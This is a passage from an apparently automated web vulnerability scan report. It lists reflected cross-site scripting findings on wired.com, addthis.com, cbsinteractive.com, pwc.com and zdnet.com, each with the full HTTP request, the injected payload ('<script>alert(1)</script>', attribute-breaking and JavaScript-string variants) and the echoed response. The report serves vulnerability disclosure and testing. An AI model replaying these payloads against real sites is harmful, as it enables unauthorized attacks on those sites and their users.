The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e6e4"><a>5dd758f037d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user6e6e4"><a>5dd758f037d/login HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28617
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:12:23 GMT
Date: Wed, 12 Jan 2011 05:08:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user6e6e4"><a>5dd758f037d ss_login">
...[SNIP]...

3.64. http://www.wired.com/user/login [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/login

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c812"><a>5f7d13f6048 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/login1c812"><a>5f7d13f6048 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28617
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:13:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:13:01 GMT
Connection: close
Set-Cookie: JSESSIONID=cabM-CK_HDwqVgt0cP41s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_login1c812"><a>5f7d13f6048">
...[SNIP]...

3.65. http://www.wired.com/user/logout [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/logout

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7759e"><a>e2aad4de1c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user7759e"><a>e2aad4de1c1/logout HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28619
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:12:28 GMT
Date: Wed, 12 Jan 2011 05:08:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user7759e"><a>e2aad4de1c1 ss_logout">
...[SNIP]...

3.66. http://www.wired.com/user/logout [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/logout

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e31"><a>04439d0209d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/logout68e31"><a>04439d0209d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28619
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:12:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:12:54 GMT
Connection: close
Set-Cookie: JSESSIONID=abcwtLdaCQT637ylbP41s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_logout68e31"><a>04439d0209d">
...[SNIP]...

3.67. http://www.wired.com/user/registration [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/registration

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6859"><a>f18010a37e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /usere6859"><a>f18010a37e9/registration HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28631
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:13:12 GMT
Date: Wed, 12 Jan 2011 05:09:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_usere6859"><a>f18010a37e9 ss_registration">
...[SNIP]...

3.68. http://www.wired.com/user/registration [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/registration

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eb8b"><a>e52b868ec54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/registration6eb8b"><a>e52b868ec54 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28631
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:13:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:13:15 GMT
Connection: close
Set-Cookie: JSESSIONID=acbOZw9Mr3a9Y7nkgP41s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_registration6eb8b"><a>e52b868ec54">
...[SNIP]...

3.69. http://www.wired.com/video/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d31f0"><a>5e756706c49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videod31f0"><a>5e756706c49/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28605
Vary: Accept-Encoding
Cache-Control: max-age=292
Expires: Wed, 12 Jan 2011 05:12:52 GMT
Date: Wed, 12 Jan 2011 05:08:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videod31f0"><a>5e756706c49">
...[SNIP]...

3.70. http://www.wired.com/video/search/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/search/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d05"><a>3d4bdf06559 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videoc2d05"><a>3d4bdf06559/search/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28622
Vary: Accept-Encoding
Cache-Control: max-age=280
Expires: Wed, 12 Jan 2011 05:12:40 GMT
Date: Wed, 12 Jan 2011 05:08:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videoc2d05"><a>3d4bdf06559 ss_search">
...[SNIP]...

3.71. http://www.wired.com/video/search/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/search/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a6e"><a>13c7c111330 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/search32a6e"><a>13c7c111330/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=276
Expires: Wed, 12 Jan 2011 05:16:48 GMT
Date: Wed, 12 Jan 2011 05:12:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_search32a6e"><a>13c7c111330">
...[SNIP]...

3.72. http://www.wired.com/video/search/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/search/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b2e3"-alert(1)-"1d49aac262e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/search3b2e3"-alert(1)-"1d49aac262e/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=300
Expires: Wed, 12 Jan 2011 05:18:11 GMT
Date: Wed, 12 Jan 2011 05:13:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107866


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<!--

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "search3b2e3"-alert(1)-"1d49aac262e","video"], charmap : {' ' : '+', '-' : '_'}});
//-->
...[SNIP]...

3.73. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 58b68<script>alert(1)</script>3763bb90dac was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=58b68<script>alert(1)</script>3763bb90dac

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:18:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<h4>58b68<script>alert(1)</script>3763bb90dac - Google search</h4>
...[SNIP]...

3.74. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8dc2"><script>alert(1)</script>e3ab32dcff8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a8dc2"><script>alert(1)</script>e3ab32dcff8

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:18:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=a8dc2"><script>alert(1)</script>e3ab32dcff8" />
...[SNIP]...

3.75. http://www.cbsinteractive.com/adfeedback/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cbsinteractive.com
Path:   /adfeedback/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a4ae"><script>alert(1)</script>852aef82148 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /adfeedback/ HTTP/1.1
Host: www.cbsinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4a4ae"><script>alert(1)</script>852aef82148

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:26:14 GMT
Server: Apache/2.2
Keep-Alive: timeout=15, max=868
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 21660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

...[SNIP]...
<input type="hidden" name="refurl" value="http://www.google.com/search?hl=en&q=4a4ae"><script>alert(1)</script>852aef82148" />
...[SNIP]...

3.76. http://www.pwc.com/en_GX/webadmin/forms/contactUs.jhtml [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pwc.com
Path:   /en_GX/webadmin/forms/contactUs.jhtml

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3a98"><script>alert(1)</script>ff110ca5099 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /en_GX/webadmin/forms/contactUs.jhtml HTTP/1.1
Host: www.pwc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PWC_WOD=id=173.193.214.243-2605364368.30126492:lv=1294760111214:ss=1294760084820; __utmz=257467274.1294756485.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=price%20waterhouse; __utma=257467274.728746398.1294756485.1294756485.1294756485.1; __utmc=257467274; __utmb=257467274.1.10.1294756485; LD.previous.visitor.us.pwc.com=true;
Referer: http://www.google.com/search?hl=en&q=b3a98"><script>alert(1)</script>ff110ca5099

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Date: Tue, 11 Jan 2011 14:35:30 GMT
Content-Length: 28240
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gx" lang="en-gx">
<h
...[SNIP]...
<input type="hidden" name="SourceLink" value="http://www.google.com/search?hl=en&q=b3a98"><script>alert(1)</script>ff110ca5099" />
...[SNIP]...

3.77. http://www.zdnet.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaf41"-alert(1)-"1c24072dd63 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: aaf41"-alert(1)-"1c24072dd63

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 05:13:21 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22623%22%2C%22longittude%22%3A%22-96.799%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22dallas%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2277%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2232.787%22%7D; expires=Thu, 12-Jan-2012 05:13:21 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=982
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 120774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
log.com.com/adlog/c/r=16468&amp;sg=484398&amp;o=10%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2000&amp;nd=10&amp;pid=&amp;cid=0&amp;pp=100&amp;e=&amp;rqid=00c13-ad-e5:4D2D117229E326&amp;orh=aaf41"-alert(1)-"1c24072dd63&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=aaf41"-alert(1)-"1c24072dd63&amp;cpnmodule=&amp;count=&amp;ra=173.193.214.243&amp;pg=QoA04goPOUsAABpwKpwAAAA6&amp;t=2011.01.12.05.13.21/http://ad.do
...[SNIP]...

3.78. http://www.zdnet.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b55d0"><a>dadba004ac was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: b55d0"><a>dadba004ac

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 05:09:29 GMT
Server: Apache
